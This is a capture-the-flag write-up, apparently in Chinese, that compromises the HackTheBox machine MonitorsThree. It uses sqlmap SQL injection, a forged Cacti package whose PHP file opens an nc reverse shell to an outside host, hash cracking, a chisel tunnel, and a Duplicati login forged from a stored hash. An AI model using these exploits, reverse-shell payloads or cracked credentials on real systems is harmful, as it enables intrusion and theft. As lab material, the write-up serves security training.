[Meachines] [Medium] MonitorsThree SQLI+Cacti-CMS-RCE+Duplicati权限提升
信息收集
IP Address | Opening Ports |
---|---|
10.10.11.30 | TCP:22,80 |
$ nmap -p- 10.10.11.30 --min-rate 1000 -sC -sV -Pn
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 86:f8:7d:6f:42:91:bb:89:72:91:af:72:f3:01:ff:5b (ECDSA)
|_ 256 50:f9:ed:8e:73:64:9e:aa:f6:08:95:14:f0:a6:0d:57 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://monitorsthree.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Cacti
# echo '10.10.11.30 monitorsthree.htb' >>/etc/hosts
http://monitorsthree.htb/
$ ffuf -w ~/Subdomain.txt -u http://monitorsthree.htb -H 'HOST: FUZZ.10.10.11.30' -fs 13560
# echo '10.10.11.30 cacti.monitorsthree.htb' >>/etc/hosts
http://cacti.monitorsthree.htb/cacti/
$ sqlmap -u 'http://monitorsthree.htb/forgot_password.php' --level=5 --risk=3 --batch
admin:greencacti2001
<?php
// Builds a Cacti package archive (test.xml.gz) that contains a single file,
// resource/test.php, plus the signing material the package format expects.
//
// Security note for reviewers: the package format carries its own <publickey>,
// and both signatures below are produced with a key pair generated on the spot
// (openssl_pkey_new), so a signature check performed against the embedded key
// only proves internal consistency, not that a trusted publisher produced the
// package. An importer that accepts an arbitrary embedded key is, in effect,
// accepting unsigned content; packages should be verified against a key the
// operator already trusts, and the import feature restricted to administrators.
$xmldata = "<xml>
<files>
<file>
<name>resource/test.php</name>
<data>%s</data>
<filesignature>%s</filesignature>
</file>
</files>
<publickey>%s</publickey>
<signature></signature>
</xml>";
// Content of the packaged file. It is PHP source, so a successful import
// presumably places executable code inside the Cacti install (under the web
// root on this box) — the reason package import is a code-execution boundary.
$filedata = "<?php shell_exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.43 10032 >/tmp/f'); ?>";
// Throwaway key pair: the private half signs, the public half ships in the package.
$keypair = openssl_pkey_new();
$public_key = openssl_pkey_get_details($keypair)["key"];
// Per-file signature over the raw (not yet base64-encoded) file content.
openssl_sign($filedata, $filesignature, $keypair, OPENSSL_ALGO_SHA256);
// Every payload field inside the XML is base64; the file is signed raw but transported encoded.
$data = sprintf($xmldata, base64_encode($filedata), base64_encode($filesignature), base64_encode($public_key));
// Package-level signature is computed over the document with an empty
// <signature> element, then spliced in by string replacement.
openssl_sign($data, $signature, $keypair, OPENSSL_ALGO_SHA256);
file_put_contents("test.xml", str_replace("<signature></signature>", "<signature>".base64_encode($signature)."</signature>", $data));
// Gzip the archive for the import step shown later on this page and drop the plain copy.
system("cat test.xml | gzip -9 > test.xml.gz; rm test.xml");
?>
$ php rev.php
Import/Export -> Import Packages
www-data@monitorsthree:~/html$ cat /var/www/html/cacti/include/config.php
user:cactiuser password:cactiuser
MariaDB [cacti]> select * from user_auth\G;
$2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK
$ hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt
user:marcus password:12345678910
www-data@monitorsthree:~/html/cacti/resource$ su marcus
User.txt
f9fb42ef0c734ab3310e509e6b1117c5
Privilege Escalation && Duplicati
$ ./chisel client 10.10.16.43:8000 R:8200:localhost:8200
$ chisel server -p 8000 --reverse
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----
$ scp -i /tmp/id_rsa marcus@monitorsthree.htb:/opt/duplicati/config/Duplicati-server.sqlite .
$ sqlite3 Duplicati-server.sqlite
$ echo 'Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=' | base64 -d | xxd -p -c 256
get-nonce=1
2dlBrErvpm9f5CXhY945hSOXSKoL0dlRcP8/4L0sRXM=
// saltedpwd is the server-side password hash taken from Duplicati-server.sqlite
// (copied off the host in the steps above). The nonce response below is derived
// from this stored value alone, so read access to the server database is enough to
// answer the login challenge — the stored hash is password-equivalent. Defensive
// takeaway: protect the Duplicati config directory and database as strictly as the
// password itself, and rotate the password if the database may have been exposed.
var saltedpwd = '59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a';
// Answer to the server nonce (the base64 value from the get-nonce reply above):
// SHA-256 over the raw nonce bytes followed by the hex-decoded salted hash,
// emitted as base64.
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('2dlBrErvpm9f5CXhY945hSOXSKoL0dlRcP8/4L0sRXM=') + saltedpwd)).toString(CryptoJS.enc.Base64);
console.log(noncedpwd);
password=h4LMqdVeLuzUINQU48IOw%2bCMiGqxaMi6rs/p1CDsm0Y%3d
http://127.0.0.1:8200/ngax/index.html#/add
/source/tmp/
/source/root/root.txt
添加路径
http://127.0.0.1:8200/ngax/index.html#/restorestart
http://127.0.0.1:8200/ngax/index.html#/restore/18
$ marcus@monitorsthree:~/root.txt$ cat root.txt
Root.txt
0bc465bacfe9ffc0f42898508faafa69